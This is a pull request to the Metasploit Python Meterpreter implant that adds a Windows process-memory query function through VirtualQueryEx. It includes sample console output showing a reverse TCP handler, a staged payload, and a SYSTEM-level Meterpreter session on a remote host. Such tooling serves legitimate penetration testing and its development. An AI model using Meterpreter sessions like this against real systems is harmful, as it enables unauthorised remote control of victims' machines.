### PR TITLE
add stdapi_sys_process_memory_query function to python windows meterp…

### DIFF
--- a/python/meterpreter/ext_server_stdapi.py
+++ b/python/meterpreter/ext_server_stdapi.py
@@ -1756,8 +1756,8 @@ def stdapi_sys_process_memory_query(request, response):
     if size == 0:
         return error_result_windows(), response
 
-    response += tlv_pack(TLV_TYPE_BASE_ADDRESS, info.BaseAddress)
-    response += tlv_pack(TLV_TYPE_ALLOC_BASE_ADDRESS, info.AllocationBase)
+    response += tlv_pack(TLV_TYPE_BASE_ADDRESS, info.BaseAddress or 0)
+    response += tlv_pack(TLV_TYPE_ALLOC_BASE_ADDRESS, info.AllocationBase or 0)
     response += tlv_pack(TLV_TYPE_ALLOC_PROTECTION, info.AllocationProtect)
     response += tlv_pack(TLV_TYPE_LENGTH, info.RegionSize)
     response += tlv_pack(TLV_TYPE_MEMORY_STATE, info.State)

--- a/python/meterpreter/ext_server_stdapi.py
+++ b/python/meterpreter/ext_server_stdapi.py
@@ -404,6 +404,7 @@ if has_ctypes:
             ('BaseAddress', ctypes.c_void_p),
             ('AllocationBase', ctypes.c_void_p),
             ('AllocationProtect', ctypes.c_ulong),
+            ('PartitionId', ctypes.c_ushort),
             ('RegionSize', ctypes.c_size_t),
             ('State', ctypes.c_ulong),
             ('Protect', ctypes.c_ulong),

--- a/python/meterpreter/ext_server_stdapi.py
+++ b/python/meterpreter/ext_server_stdapi.py
@@ -399,6 +399,17 @@ if has_ctypes:
             ('dwType', ctypes.c_uint32)
         ]
 
+    class MEMORY_BASIC_INFORMATION(ctypes.Structure):
+        _fields_ = [
+            ('BaseAddress', ctypes.c_void_p),
+            ('AllocationBase', ctypes.c_void_p),
+            ('AllocationProtect', ctypes.c_ulong),
+            ('RegionSize', ctypes.c_size_t),
+            ('State', ctypes.c_ulong),
+            ('Protect', ctypes.c_ulong),
+            ('Type', ctypes.c_ulong)
+        ]
+
 
     #
     # Linux Structures
@@ -1725,6 +1736,32 @@ def stdapi_sys_process_memory_protect(request, response):
     if not VirtualProtectEx(handle, base, size, prot, ctypes.byref(old_prot)):
         return error_result_windows(), response
     response += tlv_pack(TLV_TYPE_PROTECTION, old_prot.value)
+    return ERROR_SUCCESS, response
+
+@register_function_if(has_windll)
+def stdapi_sys_process_memory_query(request, response):
+    handle = packet_get_tlv(request, TLV_TYPE_HANDLE).get('value')
+    base = packet_get_tlv(request, TLV_TYPE_BASE_ADDRESS).get('value')
+
+    if not handle:
+        return ERROR_INVALID_PARAMETER, response
+
+    VirtualQueryEx = ctypes.windll.kernel32.VirtualQueryEx
+    VirtualQueryEx.argtypes = [ctypes.c_void_p, ctypes.c_void_p, ctypes.POINTER(MEMORY_BASIC_INFORMATION), ctypes.c_size_t]
+    VirtualQueryEx.restype = ctypes.c_size_t
+
+    info = MEMORY_BASIC_INFORMATION()
+    size = VirtualQueryEx(handle, base, ctypes.byref(info), ctypes.sizeof(info))
+    if size == 0:
+        return error_result_windows(), response
+
+    response += tlv_pack(TLV_TYPE_BASE_ADDRESS, info.BaseAddress)
+    response += tlv_pack(TLV_TYPE_ALLOC_BASE_ADDRESS, info.AllocationBase)
+    response += tlv_pack(TLV_TYPE_ALLOC_PROTECTION, info.AllocationProtect)
+    response += tlv_pack(TLV_TYPE_LENGTH, info.RegionSize)
+    response += tlv_pack(TLV_TYPE_MEMORY_STATE, info.State)
+    response += tlv_pack(TLV_TYPE_PROTECTION, info.Protect)
+    response += tlv_pack(TLV_TYPE_MEMORY_TYPE, info.Type)
     return ERROR_SUCCESS, response
 
 @register_function_if(has_windll)


### PR DESCRIPTION
This PR implements `stdapi_sys_process_memory_query` function for python meterpreter. By this api you can query basic information of specific memory region.

Tested with:

- Python 3.7.2

Sample output:
```
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.0.0.22:4444 
[*] Sending stage (24772 bytes) to 10.0.0.2
[*] Meterpreter session 9 opened (10.0.0.22:4444 -> 10.0.0.2:49846) at 2023-05-09 16:08:07 -0400

meterpreter > pry
[*] Starting Pry shell...
[*] You are in the "client" (session) object

[1] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> proc = sys.process.open(4384)
=> #<#<Class:0x00007fd60a4d8040>:0x00007fd609823548
 @aliases=
  {"image"=>#<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessSubsystem::Image:0x00007fd6098233e0 @process=#<#<Class:0x00007fd60a4d8040>:0x00007fd609823548 ...>>,
   "io"=>#<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessSubsystem::IO:0x00007fd609823390 @process=#<#<Class:0x00007fd60a4d8040>:0x00007fd609823548 ...>>,
   "memory"=>#<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessSubsystem::Memory:0x00007fd609823340 @process=#<#<Class:0x00007fd60a4d8040>:0x00007fd609823548 ...>>,
   "thread"=>#<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessSubsystem::Thread:0x00007fd6098232f0 @process=#<#<Class:0x00007fd60a4d8040>:0x00007fd609823548 ...>>},
 @channel=nil,
 @client=#<Session:meterpreter 10.0.0.2:49846 (10.0.0.2) "NT AUTHORITY\SYSTEM @ DESKTOP-5HNNBGG">,
 @handle=712,
 @pid=4384>
[2] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> proc.memory.query(0)
=> {"BaseAddress"=>nil, "AllocationBase"=>nil, "AllocationProtect"=>2, "RegionSize"=>nil, "Protect"=>2}
[3] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> proc.memory.query(0x7ffe0000)
=> {"BaseAddress"=>2147352576, "AllocationBase"=>2147352576, "AllocationProtect"=>1, "RegionSize"=>4096, "Available"=>false, "Protect"=>1, "PrivateMapping"=>true}
[4] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> proc.memory.query(0x54d0a00000)
=> {"BaseAddress"=>364277399552, "AllocationBase"=>364277399552, "AllocationProtect"=>2, "RegionSize"=>1273856, "Reserved"=>true, "Protect"=>nil, "PrivateMapping"=>true}
[5] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> 
```